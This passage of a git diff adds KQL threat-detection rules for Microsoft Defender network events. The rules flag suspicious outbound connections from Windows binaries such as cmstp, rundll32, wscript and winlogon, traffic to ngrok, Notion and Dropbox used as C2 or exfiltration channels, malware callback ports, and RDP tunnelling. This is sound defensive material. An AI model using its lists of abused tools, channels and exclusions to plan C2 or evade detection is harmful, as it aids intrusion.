ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql
new file mode 100644
index 00000000..420bbeae
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql
@@ -0,0 +1,11 @@
+// Title: Outbound Network Connection Initiated By Cmstp.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects a network connection initiated by Cmstp.EXE
+// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql
new file mode 100644
index 00000000..3c5c13f6
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql
@@ -0,0 +1,14 @@
+// Title: Outbound Network Connection Initiated By Microsoft Dialer
+// Author: CertainlyP
+// Date: 2024-04-26
+// Level: high
+// Description: Detects outbound network connection initiated by Microsoft Dialer.
+// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
+// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1071.001
+// False Positives:
+//   - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql
new file mode 100644
index 00000000..377a8332
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection Initiated By Script Interpreter
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-28
+// Level: high
+// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate scripts
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql
new file mode 100644
index 00000000..f38685ec
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_to_public_ip_via_winlogon.kql
@@ -0,0 +1,12 @@
+// Title: Outbound Network Connection To Public IP Via Winlogon
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2023-04-28
+// Level: medium
+// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011
+// False Positives:
+//   - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql
new file mode 100644
index 00000000..e9ce9edc
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_rdp_connections_over_non_standard_tools.kql
@@ -0,0 +1,13 @@
+// Title: Outbound RDP Connections Over Non-Standard Tools
+// Author: Markus Neis
+// Date: 2019-05-15
+// Level: high
+// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
+// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002
+// False Positives:
+//   - Third party RDP tools
+
+DeviceNetworkEvents
+| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ "<unknown process>")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql
new file mode 100644
index 00000000..fcaa16fc
--- /dev/null
+++ b/KQL/rules/windows/network_connection/potentially_suspicious_malware_callback_communication.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Malware Callback Communication
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql
new file mode 100644
index 00000000..e3570b2b
--- /dev/null
+++ b/KQL/rules/windows/network_connection/potentially_suspicious_network_connection_to_notion_api.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Network Connection To Notion API
+// Author: Gavin Knapp
+// Date: 2023-05-03
+// Level: low
+// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+//   - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.
+
+DeviceNetworkEvents
+| where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql
new file mode 100644
index 00000000..fccf216e
--- /dev/null
+++ b/KQL/rules/windows/network_connection/potentially_suspicious_wuauclt_network_connection.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Wuauclt Network Connection
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: medium
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
+// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
+| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId "))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql
new file mode 100644
index 00000000..e9168354
--- /dev/null
+++ b/KQL/rules/windows/network_connection/process_initiated_network_connection_to_ngrok_domain.kql
@@ -0,0 +1,14 @@
+// Title: Process Initiated Network Connection To Ngrok Domain
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-16
+// Level: high
+// Description: Detects an executable initiating a network connection to "ngrok" domains.
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102
+// False Positives:
+//   - Legitimate use of the ngrok service.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/python_initiated_connection.kql b/KQL/rules/windows/network_connection/python_initiated_connection.kql
new file mode 100644
index 00000000..bb3abc56
--- /dev/null
+++ b/KQL/rules/windows/network_connection/python_initiated_connection.kql
@@ -0,0 +1,12 @@
+// Title: Python Initiated Connection
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql
new file mode 100644
index 00000000..2b3e030b
--- /dev/null
+++ b/KQL/rules/windows/network_connection/rdp_over_reverse_ssh_tunnel.kql
@@ -0,0 +1,10 @@
+// Title: RDP Over Reverse SSH Tunnel
+// Author: Samir Bousseaden
+// Date: 2019-02-16
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
+| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql
new file mode 100644
index 00000000..a71eedb4
--- /dev/null
+++ b/KQL/rules/windows/network_connection/rdp_to_http_or_https_target_ports.kql
@@ -0,0 +1,10 @@
+// Title: RDP to HTTP or HTTPS Target Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-29
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql
new file mode 100644
index 00000000..bb0df4e6
--- /dev/null
+++ b/KQL/rules/windows/network_connection/regasm_exe_initiating_network_connection_to_public_ip.kql
@@ -0,0 +1,10 @@
+// Title: RegAsm.EXE Initiating Network Connection To Public IP
+// Author: frack113
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql
new file mode 100644
index 00000000..a330e552
--- /dev/null
+++ b/KQL/rules/windows/network_connection/remote_access_tool_anydesk_incoming_connection.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - AnyDesk Incoming Connection
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-09-02
+// Level: medium
+// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/rundll32_internet_connection.kql b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql
new file mode 100644
index 00000000..ba46f5e8
--- /dev/null
+++ b/KQL/rules/windows/network_connection/rundll32_internet_connection.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Internet Connection
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-04
+// Level: medium
+// Description: Detects a rundll32 that communicates with public IP addresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.execution
+// False Positives:
+//   - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql
new file mode 100644
index 00000000..60bd1a55
--- /dev/null
+++ b/KQL/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.kql
@@ -0,0 +1,10 @@
+// Title: Silenttrinity Stager Msbuild Activity
+// Author: Kiran kumar s, oscd.community
+// Date: 2020-10-11
+// Level: high
+// Description: Detects a possible remote connections to Silenttrinity c2
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127.001
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\msbuild.exe" and (RemotePort in~ ("80", "443"))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql
new file mode 100644
index 00000000..06615ead
--- /dev/null
+++ b/KQL/rules/windows/network_connection/suspicious_dropbox_api_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Dropbox API Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-20
+// Level: high
+// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002
+// False Positives:
+//   - Legitimate use of the API with a tool that the author wasn't aware of
+
+DeviceNetworkEvents
+| where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath contains "\\Dropbox"))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql
new file mode 100644
